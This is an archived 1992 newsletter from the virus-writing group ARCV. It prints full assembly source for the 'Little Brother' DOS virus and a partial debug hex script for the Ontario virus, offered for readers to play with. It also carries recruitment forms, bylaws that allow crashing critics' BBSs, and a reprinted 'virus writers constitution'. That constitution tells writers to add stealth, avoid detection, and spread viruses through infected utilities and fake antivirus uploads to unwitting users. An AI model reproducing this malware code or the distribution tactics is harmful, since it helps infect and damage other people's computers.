💾 Archived View for jay.scot › files › groups › arcv › newsletter › arcvnews01.txt captured on 2021-12-04 at 18:04:22.

View Raw

More Information

-=-=-=-=-=-=-


                                    The
                          ��    ���    ���   �  �
                         ����   ����   �     �  �
                         �  � � � �� � ��� � ���� �
                                     
              ����The Association of Really Cruel Viruses.��Ŀ
              ������������������������������������������������


     Welcome to the first ARCV Newsletter....

     We hope you are all having a Spiffing Time out there....

     First lets introduce the 'Team'.

     The Keyboard Basher - Apache Warrior.
     The Other One - ICE-9.

     Well you may or may not know that we here are one the only Truly
     English Computer Underground Organisation (And just to piss off the
     Americans Out there we will spell everything with an 's' not a 'z'). 
     In this and future newsletters we will be dodging Special Branch and
     New Scotland Yard as we go, as well as putting in the odd virus ASM
     file, Debug Dump for you all to have fun with.  We will also provide
     information on what's happening (DUDE) out there in Computer Land.

                                 Contents.

     000..........................................................Contents.
     001...................................Virus Spotlight, Little Brother.
     002............................................ARCV Application Forms.
     003.........................What is The ARCV, and Who are its Members.
     004.....................................................Ontario Virus.
     005......................................................Sunday Virus.
     006...........................................................Closing.

     The file in the Archive ARCVVIR.COM is a self displaying List of all
     the ARCV Viruses we have produced.  (Requires ANSI.SYS)


     Greetings...To
     The Guy Who Wrote CHAOS - Thanks Bud
     The Guy Who Wrote FU MANCHU - Are you English?
     Patti 'VSUM' Hoffman - We are here to make your Life HELL!
     John McAfee - To Think if wasn't for us you'd be Unemployed
     The Guy Who Wrote MICHELANGELO - Geta LIFE!!!!!!!!!!!!!
     Terry Pratchett - You Are COOOOOOOOL!
          And Are Carnivorous Plants Really that Boring?
     

ARCV NEWS                                                              001.

                            - Virus Spotlight -

                              Little Brother.

     Now this virus, is rather crafty as is relies on good old MSDOS
program handling to work, ie. The Fact that .COM files are allways load
before .EXE files.  First lets see what Patti has to say.

 Virus Name:  Little Brother  
 Aliases:     
 V Status:    Rare 
 Discovered:  October, 1991 
 Symptoms:    307 byte .COM files 
 Origin:      The Netherlands 
 Eff Length:  307 Bytes 
 Type Code:   SRCE - Spawning Resident .EXE Infector 
 Detection Method:  ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+ 
 Removal Instructions:  Delete infected .COM programs 
 
 General Comments: 
     The Little Brother virus was submitted from the Netherlands in
October, 1991.  This virus is a spawning virus similar in technique to the
Aids 2 and Twin-351 viruses.  
 
     The first time a program infected with Little Brother is executed,
Little Brother will become memory resident in a "hole" in low system memory
in the system data area, hooking interrupt 21.  There will be no change in
total system or available free memory.  

     Once resident, the Little Brother virus will infect .EXE programs when
they are executed.  The .EXE program itself will not be altered, but a
corresponding .COM program will be created by the virus of 307 bytes.  This
corresponding.COM program will contain pure virus code and have a date/time
stamp in the DOS directory of when it was created.  The following text
strings can be found in the 307 byte .COM files: 
 
               "Little Brother" 
               "EXE COM" 
 
     Since DOS will execute .COM programs before .EXE programs, whenever
the user attempts to execute a .EXE program, the corresponding .COM program
will be executed first.  The .COM program, when finished will then start
the .EXE program the user was attempting to execute. 

     Well lets get to the Asm source.
---------------------------------------------------------------------------
cseg            segment 
                assume  cs:cseg,ds:cseg,es:nothing 
 
                org     100h 
 
FILELEN         equ     quit - begin 
RESPAR          equ     (FILELEN/16) + 17 
VER_ION         equ     1 
oi21            equ     quit 
nameptr         equ     quit+4 
DTA             equ     quit+8 
 
                .RADIX  16 
 
 
;**************************************************************************
;*              Start the program! 
;**************************************************************************
 
begin:          cld 
 
                mov     ax,0DEDEh               ;already installed? 
                int     21h 
                cmp     ah,041h 
                je      cancel 
 
                mov     ax,0044h                ;move program to empty hole

                mov     es,ax 
                mov     di,0100h 
                mov     si,di 
                mov     cx,FILELEN 
        rep     movsb 
 
                mov     ds,cx                   ;get original int21 vector

                mov     si,0084h 
                mov     di,offset oi21 
                movsw 
                movsw 
 
                push    es                      ;set vector to new handler

                pop     ds 
                mov     dx,offset ni21 
                mov     ax,2521h 
                int     21h 
 
cancel:         ret 
 
 
;**************************************************************************
;*              File-extensions 
;**************************************************************************

EXE_txt         db      'EXE',0 
COM_txt         db      'COM',0 
 
;**************************************************************************
;*              Interupt handler 24 
;**************************************************************************
ni24:           mov     al,03 
                iret 
 
;**************************************************************************
;*              Interupt handler 21 
;**************************************************************************

ni21:           pushf 
 
                cmp     ax,0DEDEh               ;install-check ? 
                je      do_DEDE 
 
                push    dx 
                push    bx 
                push    ax 
                push    ds 
                push    es 
 
                cmp     ax,4B00h                ;execute ? 
                jne     exit 
 
doit:           call    infect 
 
exit:           pop     es 
                pop     ds 
                pop     ax 
                pop     bx 
                pop     dx 
                popf 
 
                jmp     dword ptr cs:[oi21]     ;call to old int-handler 
 
do_DEDE:        mov     ax,04100h+VER_ION       ;return a signature 
                popf 
                iret 
 
 
;**************************************************************************
;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX) 
;**************************************************************************

infect:         cld 
 
                mov     word ptr cs:[nameptr],dx  ;save the ptr to the
                                                  ;filename 
                mov     word ptr cs:[nameptr+2],ds 
 
                push    cs                      ;set new DTA 
                pop     ds 
                mov     dx,offset DTA 
                mov     ah,1Ah 
                int     21 
 
                call    searchpoint 
                mov     si,offset EXE_txt       ;is extension 'EXE'? 
                mov     cx,3 
        rep     cmpsb 
                jnz     do_com 
 
do_exe:         mov     si,offset COM_txt       ;change extension to COM 
                call    change_ext 
 
                mov     ax,3300h                ;get ctrl-break flag 
                int     21 
                push    dx 
 
                xor     dl,dl                   ;clear the flag 
                mov     ax,3301h 
                int     21 
 
                mov     ax,3524h                ;get int24 vector 
                int     21 
                push    bx 
                push    es 
 
                push    cs                   ;set int24 vec to new handler 
                pop     ds 
                mov     dx,offset ni24 
                mov     ax,2524h 
                int     21 
 
                lds     dx,dword ptr [nameptr]  ;create the file (unique   
                                                ;name) 
                xor     cx,cx 
                mov     ah,5Bh 
                int     21 
                jc      return1                  
                xchg    bx,ax                   ;save handle 
 
                push    cs 
                pop     ds 
                mov     cx,FILELEN              ;write the file 
                mov     dx,offset begin 
                mov     ah,40h 
                int     21 
                cmp     ax,cx 
                pushf 
 
                mov     ah,3Eh                  ;close the file 
                int     21 
 
                popf 
                jz      return1                 ;all bytes written? 
 
                lds     dx,dword ptr [nameptr]  ;delete the file 
                mov     ah,41h 
                int     21 
 
return1:        pop     ds                      ;restore int24 vector 
                pop     dx 
                mov     ax,2524h 
                int     21 
 
                pop     dx                      ;restore ctrl-break flag 
                mov     ax,3301h 
                int     21 
 
                mov     si,offset EXE_txt       ;change extension to EXE 
                call    change_ext 
 
return:         ret 
 
do_com:         call    findfirst               ;is the file a virus? 
                cmp     word ptr cs:[DTA+1Ah],FILELEN 
                jne     return 
                mov     si,offset EXE_txt       ;does the EXE-variant
exist? 
                call    change_ext 
                call    findfirst 
                jnc     return 
                mov     si,offset COM_txt       ;change extension to COM 
                jmp     short change_ext 
 
 
;**************************************************************************
;*              Find the file 
;**************************************************************************

findfirst:      lds     dx,dword ptr [nameptr] 
                mov     cl,27h 
                mov     ah,4Eh 
                int     21 
                ret                 
 
 
;**************************************************************************
;*              change the extension of the filename (CS:SI -> ext) 
;**************************************************************************

change_ext:     call    searchpoint 
                push    cs 
                pop     ds 
                movsw 
                movsw 
                ret 
 
 
;**************************************************************************
;*              search begin of extension   
;**************************************************************************

searchpoint:    les     di,dword ptr cs:[nameptr] 
                mov     ch,0FFh 
                mov     al,'.' 
        repnz   scasb 
                ret 
 
 
;**************************************************************************
;*              Text and Signature 
;**************************************************************************

                db      'Little Brother',0 
 
quit: 
 
cseg            ends 
                end     begin 
 
     Quite a Simple idea for a virus but it works.

     Apche.ARCV NEWS                                                              002.

     Well I thought it could be a good idea if I put in the relevant ARCV
Application forms for any one who may wish to join the ranks of the ARCV. 
At the moment we are looking for MAC Virus programmers, and AMIGA Virus
Programmers and others.  Also we are looking Couriers for the ARCV (BBS's
for Distribution), that are based all over the world in Britain, USA and
Eastern Europe Mainly but other countries will get equal consideration.  so
less of the waffle and to the Applications.

---------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

              
 
                    ///////   ////////    /////////   //       // 
                   //   //   //    //    //          //     //
                  ///////   ///////     //          //   //
                 //   //   //    //    //          // // 
                //   // * //     // * ///////// * /// 
              
      
                                   THE 
                               ASSOCIATION 
                                OF REALLY
                                  CRUEL 
                                 VIRUSES 
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 
                  The Association of Really Cruel Viruses 
  
                Courier and/or Membership Application Form 
 
 
  For any purpose other than to evaluate this application, the data in all 
  sections of this application shall not be disclosed outside the internal 
  leadership of the ARCV.  For more ARCV information please see ARCV 
  prologue.
 
---------------------------------------------------------------------------
 
 FALSE STATEMENT: A person is guilty of False Statement when he/she 
                 Intentionally makes a false statement under oath or 
                 pursuant to a form bearing Notice. 
 
                 You are here to fore-warned... 
 
                 FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! 
---------------------------------------------------------------------------
 
 PART A: Background Information 
 
 
  1. Date of Application:__________________________________ 
 
  2. Applicants Name (Last,First,Middle,Maiden): 
     
     ______________________________________________________ 
 
  3. Applicants Current Handle:____________________________ 
 
  4. List all other Handles by which you have been known. 
 
     ______________________________________________________ 
 
     ______________________________________________________ 
 
  5. Residence Address (Number,Street,City or Town,County and Post Code): 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
  6. Home Telephone Number (Area Code and Number): 
 
     _______________________________________________________ 
 
  7. Home Data Number (Area Code and Number): 
 
     _______________________________________________________ 
 
  8. Fidonet Contact address (full address, including name to contact):

     _______________________________________________________

     _______________________________________________________

  9. Age:__________  Date of Birth:_________________________ 
 
  10. Marital Status: ___ Married    ___ Separated 
                      
                      ___ Single     ___ Divorced 

  11. Nationality __________________________________________

  12. Have you at any time used a virus? YES/NO ____________

      If Yes, explain: _____________________________________

      ______________________________________________________

      ______________________________________________________

  13. Have you at any time been the victim of a virus attack?

      YES/NO _________________

      If yes, explain: _____________________________________

      ______________________________________________________

      ______________________________________________________


 Part B: Legal Information 
 
   
  1. Have You ever been convicted in any court of a crime 
     punishable by imprisonment for a term exceeding 1 year? 
 
     No _____ 
 
     Yes ____ If yes, explain: _____________________________ 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
  2. Are you currently on Probation,Parole,a Work-Release Program 
     or Released on Personal Recognizance or Bond Pending Court Action? 
 
     No _____ 
 
     Yes ____ If yes, explain: ______________________________ 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
  3. Are you Now or ever have been a member of any form of 
     Law Enforcement Agency, Such as: FBI,Secret Service,NSA, 
     CIA,BATF,State or Local Police,Special Branch etc.? 
 
     No _____ 
 
     Yes ____ If yes, explain: _____________________________ 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
  4. Are you Now or ever have been a member of any form of 
     group that investigates the Computer Underground? 
     Such as: Software Publishers Association,etc. 
 
     No _____ 
 
     Yes ____ If yes, explain: _____________________________ 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
  5. Do you belong To any Organized Computer Club or Group? 
 
     No _____ 
 
     Yes ____ If yes, explain: _____________________________ 
 
     _______________________________________________________ 
 
     _______________________________________________________ 
 
 
 Part C: ARCV Information 
 
 
  1. Are you applying to be: 
       
              An ARCV Member __________ 
 
             An ARCV Courier __________ 
 
                        Both __________ 
 
 2. If applying to be a member, Explain in detail your reason for wanting 
    to be a member of the ARCV. 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 
 
    _____________________________________________________________________ 

  3. What kind of position do you wish to hold in the ARCV?

     ____________________________________________________________________

     ____________________________________________________________________

     ____________________________________________________________________

 Part D: Qualifications

  1. Which Programming languages do you know WELL? (Place X in Boxes)

  [ ] Assembler
  [ ] Basic
  [ ] Cobol
  [ ] C (Turbo, Ansi)
  [ ] Fortran
  [ ] Pascal (Turbo, Others)

  2. Which Programming languages are you familiar which (Place x in Boxes)

  [ ] Assembler
  [ ] Basic
  [ ] Cobol
  [ ] C (Turbo, Ansi)
  [ ] Fortran
  [ ] Pascal (Turbo, Others)

  3. Have you ever written a virus? (No Trojans Please)

     No _______

     Yes ______ If yes, explain: ___________________________
 
     _______________________________________________________

     _______________________________________________________

     _______________________________________________________

  4. If you answered NO to the above DON'T answer this...
     Has the virus you've written in the Public Domain? 
     (ie. Is it released?)

     No _______

     Yes ______ If yes, explain: ___________________________
 
     _______________________________________________________

     _______________________________________________________

     _______________________________________________________

  5. If you've written a virus are you willing for it to be placed in our
     virus library?

     No _______

     Yes ______

  6. Do you have a virus collection?

     No _______

     Yes ______ If yes, explain (Please included number in collection)

     _______________________________________________________

     _______________________________________________________

     _______________________________________________________

     ________________________________________________________

 ARCV By-Laws:
---------------------------------------------------------------------------
 Section 1A-1

 ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED
 BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE
 TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B) 
---------------------------------------------------------------------------
 Section 1a-2

 DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER

 In any prosecution for any Crime under Law, in which the member was not 
 the only participant, it shall be recognized that no ARCV
 member shall provide information on any current ARCV member to any
 member of the Media or Law Enforcement Agencies.

---------------------------------------------------------------------------
 Section 1a-3

 USE OF DEADLY HACKING FORCE

 Except as provided in these sub-sections, No ARCV member shall ever damage
 delete or in any way tamper with a computer network or system.

 Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV
                    propaganda may be crashed or deleted.

 Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members
                    phone numbers,Password, or personal information may be
                    crashed or deleted.

 Exception 1a-3-3 : Any system so approved by the ARCV Council.

---------------------------------------------------------------------------

 Section 1a-4

 DISCLOSURE OF PROPRIETARY INFORMATION

 No ARCV member shall distribute confidential ARCV information.
 This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork,
 Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement
 Agency, Without the prior permission of the ARCV Council.

---------------------------------------------------------------------------

 Section 1a-5

 CONTRIBUTION OF INFORMATION

 All ARCV Members are expected to contribute to the ARCV as a whole, and
 to provide information obtained on their own. Members shall not just
 use information provided by other members or non-members.

---------------------------------------------------------------------------

 Section 1a-6

 DISCLOSURE OF MEMBERSHIP

 All ARCV members will not allow any Non-member to use his/her password,
 ID,Handle or name. And No member shall post or provide any members name
 password or phone number on any computer system without the prior consent
 of said member. All members will leave his/her name or phone number on a
 system or network at their own discretion and risk.

---------------------------------------------------------------------------

 APPENDIX A:

 1. All Information should be FREE!

 2. Promote Decentralization - Mistrust Authority

 3. Access to computers should be unlimited and Total

 4. Hackers should be judged by their hacking ability

 5. You can create art and beauty on a computer

 6. Computers can change your life for the better.
___________________________________________________________________________
 
 APPENDIX B: ***
                  �������������������������������������������
                  The Constitution of Worldwide Virus Writers
                  �������������������������������������������
                      Initial Release - February 12, 1992
                  �������������������������������������������
  
    ARTICLE I - REGARDING ORIGINAL VIRII
         Section A - DEFINITION
             The term "original virus" herein indicates programming done
             exclusively by either one individual or group, with no code
             taken from any other source, be it a book or another virus.
         Section B - CODE REQUIREMENTS
             For an original virus to conform to the standards set by
             this document, it must include the following:
                 1) The title of the virus in square brackets followed by a
                    zero byte should be in the code, in a form suitable for
                    inclusion into SCAN(1).  This is to ensure that the
                    name of the virus is known to those examining it.
                 2) The name of the author and his/her group affiliation/s
                    should be included in the code, followed by a zero
                    byte.  At the present, this is an optional requirement.
                 3) Some form of encryption or other form of stealth
                    techniques must be used.  Even a simple XOR routine
                    will suffice.
                 4) If the virus infects files, the code should be able to
                    handle infection of read only files.
                 5) It must have some feature to distinguish it from other
                    virii.  Creativity is encouraged above all else.
                 6) The virus must not be detectable by SCAN.
         Section C - IMPLEMENTATION
             This section, and all sections hereafter bearing the heading
             "IMPLEMENTATION" refer to the recommended method of
             implementation of the suggestions/requirements listed in the
             current article.
                 1) Virus_Name db '[Avocado]',0
                 2) Author     db 'Dark Angel, PHALCON/SKISM',0
  
    ARTICLE II - REGARDING "HACKED" VIRII
         Section A - DEFINITION
             The term "hacked virus" herein refers to any virus written
             by either one individual or a group which includes code
             taken from any other source, be it a book, a code fragment,
             or the entire source code from another virus.
             The term "source virus" herein refers to the virus which
             spawned the "hacked virus."
         Section B - CODE REQUIREMENTS
             For a "hacked" virus to conform to the standards set forth
             by this document, it must include the following, in addition
             to all the requirements set down in Article I of this
             document:
                 1) The title, author (if available), and affiliation of
                    the author (if available) of the original virus.
                 2) The author of the hacked virus must give the source
                    code of said virus to the author of the source virus
                    upon demand.
                 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
                    Avenger hacks are to be written.
                 4) The source virus must be improved in some manner
                    (generally in efficiency of speed or size).
                 5) The hacked virus must significantly differ from the
                    source virus, i.e. it cannot be simply a text change.
         Section C - IMPLEMENTATION
                 1) Credit db 'Source stolen from Avocado by Dark Angel of
                    PHALCON/SKISM',0
    ARTICLE III - REGARDING VIRAL STRAINS
         Section A - DEFINITION
             The term "viral strain" herein refers to any virus written
             by the original author which does not significantly differ
             from the original.  It generally implies a shrinking in code
             size, although this is not required.
         Section B - CODE REQUIREMENTS
             For a "viral strain" to conform to the standards set by this
             document, it must include the following, in addition to all
             the requirements set down in Article I of this document:
                 1) The name of the virus shall be denoted by the name of
                    the original virus followed by a dash and the version
                    letter.
                 2) The name of the virus must not change from that of the
                    original strain.
                 3) A maximum of two strains of the virus can be written.
         Section C - IMPLEMENTATION
                 1) Virus_Name db '[Avocado-B]',0
  
    ARTICLE IV - DISTRIBUTION
         Section A - DEFINITION
             The term "distribution" herein refers to the transport of
             the virus through an infected file to the medium of storage
             of a third (unwitting) party.
         Section B - INFECTION MEDIUM
             The distributor shall infect a file with the virus before
             uploading.  Suggested files include:
                 1) Newly released utility programs.
                 2) "Hacked" versions of popular anti-viral software, i.e.
                    the version number should be changed, but little else.
                 3) Beta versions of any program.
              The infected file, which must actually do something useful,
              will then be uploaded to a board.  The following boards are
              fair game:
                 1) PD Boards
                 2) Lamer boards
                 3) Boards where the sysop is a dick
               No virus shall ever be uploaded, especially by the author,
               directly to an antivirus board, such as HomeBase or
               Excalibur.
         Section C - BINARY AND SOURCE CODE AVAILABILITY
               The binary of the virus shall not be made available until at
               least two weeks after the initial (illicit) distribution of
               the virus.  Further, the source code, which need not be made
               available, cannot be released until the latest version of
               SCAN detects the virus.  The source code, should it be made
               available, should be written in English.
         Section D - DOCUMENTATION
             Documentation can be included with the archive containing
             the binary of the virus, although this is optional.  The
             author should include information about the virus suitable
             for inclusion in the header of VSUM(2).  A simple
             description will follow, though the author need not reveal
             any "hidden features" of the virus.  Note this serves two
             purposes:
                 1) Enable others to effectively spread the virus without
                    fear of self-infection.
                 2) Ensure that your virus gets a proper listing in VSUM.
    ARTICLE V - AMENDMENTS
         Section A - PROCEDURE
             To propose an amendment, you must first contact a
             PHALCON/SKISM member through one of our member boards.
             Leave a message to one of us explaining the proposed change.
             It will then be considered for inclusion.  A new copy of the
             Constitution will then be drafted and placed on member
             boards under the filename "PS-CONST.TXT" available for free
             download by all virus writers.  Additionally, an updated
             version of the constitution will be published periodically
             in our newsletter.
         Section B - AMENDMENTS
             None as of this writing.
  
    ARTICLE VI - MISCELLANEOUS
         Section A - WHO YOU CAN MAKE FUN OF
             This is a list of people who, over the past few years, have
             proved themselves to be inept and open to ridicule.
                 1) Ross M. Greenberg, author of FluShot+
                 2) Patricia (What's VSUM?) Hoffman.
                 2) People who post "I am infected by Jerusalem, what do I
                    do?" or "I have 20 virii, let's trade!"
                 3) People who don't know the difference between a virus
                    and a trojan.
                 4) Lamers and "microwares puppies"
         Section B - WHO YOU SHOULDN'T DIS TOO BADLY
             This is a list of people who, over the past few years, have
             proved themselves to be somewhat less inept and open to
             ridicule than most.
                 1) John McAfee, nonauthor of SCAN
                 2) Dennis, true author of SCAN
         Section C - MOTIVATION
             In most cases, the motivation for writing a virus should not
             be the pleasure of seeing someone else's system trashed, but
             to test one's programming abilities.
      
                  
                 
  ����������
  1 SCAN is a registered trademark of McAfee Associates.
  2 VSUM is a registered trademark of that bitch who doesn't know her own
    name.
___________________________________________________________________________

 For those applying for courier membership if we feel you are suitable we 
 will be in touch to discus the extra details.  The usual first contact 
 will be by means of a Fidonet address or a written letter.

 For those applying for normal membership then will contact you at your 
 Fidonet address, with the extra details of the membership and a list of  
 board that's we can be contacted through.
___________________________________________________________________________

 FALSE STATEMENT: A person is guilty of False Statement when he/she 
                  Intentionally makes a false statement under oath or 
                  pursuant to a form bearing Notice. 
 
                  You are here to fore-warned... 
  
                  FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! 
 
 
 I agree to the By-Laws and statements put forth on this document 
 
                          NAME: _______________________________ 
 
                          DATE: _______________________________ 
 
 To return your Application please return to Apache Warrior.  Through E-
Mail on any Flashback BBS or the BBS where you got this from.

 Please fill in the Machine Configuration data sheet and return to the 
 above address.


 PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution.


---------------------------------------------------------------------------
The ARCV'92
May the Great A'Tuin keep going........
---------------------------------------------------------------------------

     Well that's the Application form next is the machine spec. form.  This
gives us an indication of the kind of computer system you run.

---------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
              
 
                    ///////   ////////    /////////   //       // 
                   //   //   //    //    //          //     //
                  ///////   ///////     //          //   //
                 //   //   //    //    //          // // 
                //   // * //     // * ///////// * /// 
              
      
                                   THE 
                               ASSOCIATION 
                                OF REALLY
                                  CRUEL 
                                 VIRUSES 
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                 The Association of Really Cruel Viruses.

                        Machine Configuration Form.

 Please fill in all the questions truthfully as they will help us decide 
what you can offer our group.
___________________________________________________________________________


  1.  Date of Application:__________________________________ 
 
  2.  Applicants Name (Last,First,Middle,Maiden): 
     
      ______________________________________________________ 
 
  3.  Applicants Current Handle:____________________________ 

  4.  Machine Type. (Place an X in the boxes appropriate)

  [ ] IBM PC.
  [ ] AMIGA.
  [ ] ATARI ST.
  [ ] MAC.  
  [ ] ARCHIMEDES.
  [ ] OTHER, (Please State).

  5.  If you answered IBM PC to the above please answer below.  What type 
      of IBM PC do you have.

  [ ] 8086/88 Based
  [ ] 80286 Based
  [ ] 80386 (SX/DX) Based
  [ ] 80486 (SX/DX/DX2) Based
  [ ] PS/2

  6.  If you have a machine other than that of an IBM PC please state      
      processor type and manufacturer.

      _______________________________________________________________

      _______________________________________________________________

      _______________________________________________________________

  7.  Do you have any of the following equipment.

  [ ] Hard Disk, enter size and type: ______________________________

      ______________________________________________________________

  [ ] Modem, enter model and max speed: ____________________________

      ______________________________________________________________

  [ ] Printer
      [ ] 9 pin Dot Matrix
      [ ] 24 pin Dot Matrix
      [ ] Laser Printer
      [ ] Ink Jet type
      [ ] Colour

  [ ] Monochrome Display.
  [ ] CGA Display, or equivalent.
  [ ] EGA Display, or equivalent.
  [ ] VGA Display, or equivalent.
  [ ] SVGA Display, or equivalent.

  [ ] 5� inch 360K floppy.
  [ ] 5� inch 1.2Mb floppy.
  [ ] 3� inch 720Kb floppy.
  [ ] 3� inch 1.44Mb floppy.
  [ ] Other Please State: __________________________________________

  8.  What Kind of Anti-Virus Software do you use:

      _______________________________________________________________

      _______________________________________________________________

  9.  Do you believe in Virus Research? YES/NO _______________________

  10. Do you Hack? YES/NO ___________________________________________

  11. If so what kind of Systems? ___________________________________

      _______________________________________________________________

  12. Do you run a BBS? YES/NO ______________________________________

  13. If so please state BBS configuration. inc. Software, Machines.

      _______________________________________________________________

      _______________________________________________________________

      _______________________________________________________________

      _______________________________________________________________

      _______________________________________________________________

  14. If you have a BBS are you willing for us to us it? YES/NO _____

___________________________________________________________________________

 This all for now and we may ask further questions regarding your computer
 setups.  Thank you for your time.
___________________________________________________________________________

 FALSE STATEMENT: A person is guilty of False Statement when he/she 
                  Intentionally makes a false statement under oath or 
                  pursuant to a form bearing Notice. 
 
                  You are here to fore-warned... 
  
                  FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! 
 
 
 I agree to the statements put forth on this document 
 
                          NAME: _______________________________ 
 
                          DATE: _______________________________ 
 
 To return your Machine Configuration data sheet please return to Apache
Warrior.  Through E-Mail on any Flashback BBS or the BBS where you got this
from.

---------------------------------------------------------------------------
The ARCV'92  
Octarine - The Pigment of Imagination......
---------------------------------------------------------------------------ARCV NEWS                                                              003.
 
                 The Association of Really Cruel Viruses.


     This is one of the first English Computer Underground groups, although
we are an English organisation we can only be contacted through American or
Eastern Europe Virus boards.  Or we will contact through a Fidonet address.

                             What is The ARCV.

     ARCV is a organisation that is involved in Writing and Research of
computer viruses.  We hold a Library of IBM Computer viruses for the use of
the ARCV members.  But as a group we are involved in viruses for most the
main computer types (IBM PC, AMIGA, ST, MAC).  We have a Bi-Monthly
newsletter with the latest virus news from around the country and from
around the world, virus Dis-Assemblies and other virus Debug Scripts.  We
have links with PHALCON/SKISM in the US, we also have links with some
Eastern Europe Virus writers.  Are group is not only limited to virus
activities but other 'Underground' activities also (Hacking, Phreaking
etc.) so any new members who don't write viruses could be involved in any
of the other activities we are involved in.

     Are members come from the youths of today, at the moment we are mainly
English students that wish to beat and know more about the system.  We come
from a range of backgrounds from the Electronics side and the Computer
side, I myself Apache Warrior come mainly from the Electronics side but
branched to the Computer side fully around 2 years ago.  I Hack, Phreak and
write Viruses, I am the President of the group (after all I started the
group) and I am some what of an expert on beating the BT phone exchange and
being a BBS A HOLIC that comes in very handy.  Now ICE-9 is also a
Electronics guy who turned to the computer he writes viruses and is into
Heavy Metal.  Now the picture put out by the Anti-Virus Authors is that
Virus writers are Sad individuals who wear Anoraks and go Train Spotting
but well they are sadly mistaken, we are very intelligent, sound minded,
highly trained, and we wouldn't be seen in an Anorak or near an Anorak even
if dead.

     We aim to provide the ARCV members and some Non-Members an insight to
the computer underground world and would you believe it is huge.  The Group
is always seeking new members and we require new members to stay afloat,
soon we will be opening the world HQ in the UK this will have special
access areas for the ARCV members these will include access to the ARCV
Virus Library, all of which are legit viruses and No Trojans.ARCV NEWS                                                              004.

                           The Ontario Virus 

     Well heres a virus from Canada.
 
 V Status:    Rare 
 Discovered:  July, 1990 
 Symptoms:    .COM & .EXE growth; decrease in system and free memory; 
              hard disk errors in the case of extreme infections 
 Origin:      Ontario, Canada 
 Eff Length:  512 Bytes 
 Type Code:   PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector 
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+, NAV 
 Removal Instructions:  SCAN /D, or Delete infected files 
 General Comments: 
     The Ontario Virus was isolated by Mike Shields in Ontario, Canada in
     July, 1990.  The Ontario virus is a memory resident infector of .COM,
     .EXE, and overlay files.  It will infect COMMAND.COM. 

     The first time a program infected with the Ontario Virus is executed,
     it will install itself memory resident above the top of system memory
     but below the 640K DOS boundary.  Total system memory and free memory
     will be decreased by 2,048 bytes.  At this time, the virus will infect
     COMMAND.COM on the C: drive, increasing its length by 512 bytes. 
 
     Each time an uninfected program is executed on the system with the
     virus memory resident, the program will become infected with the viral
     code located at the end of the file.  For .COM files, they will
     increase by 512 bytes in all cases.  For .EXE and overlay files, the
     file length increase will be 512 - 1023 bytes.  The difference in
     length for .EXE and overlay files is because the virus will fill out
     the unused space at the end of the last sector of the uninfected file
     with random data (usually a portion of the directory) and then append
     itself to the end of the file at the next sector.  Systems using a
     sector size of more than 512 bytes may notice larger file increases
     for infected files.  Infected files will always have a file length
     that is a multiple of the sector size on the disk. 
 
     In the case of extreme infections of the Ontario Virus, hard disk
     errors may be noticed. 
 
     Ontario uses a complex encryption routine, and a simple identification
     string will not identify this virus. 
  
---------------------------------------------------------------------------
n ontario.com 
e 0100  E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72 
e 0110  61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 
e 0120  90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5 
e 0130  71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A 
e 0140  FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A 
e 0150  A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84 
e 0160  F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D 
e 0170  81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5 
e 0180  64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78 
e 0190  DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9 
e 01A0  84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8 
e 01B0  84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA 
e 01C0  84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85 
e 01D0  09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85 
e 01E0  09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A 
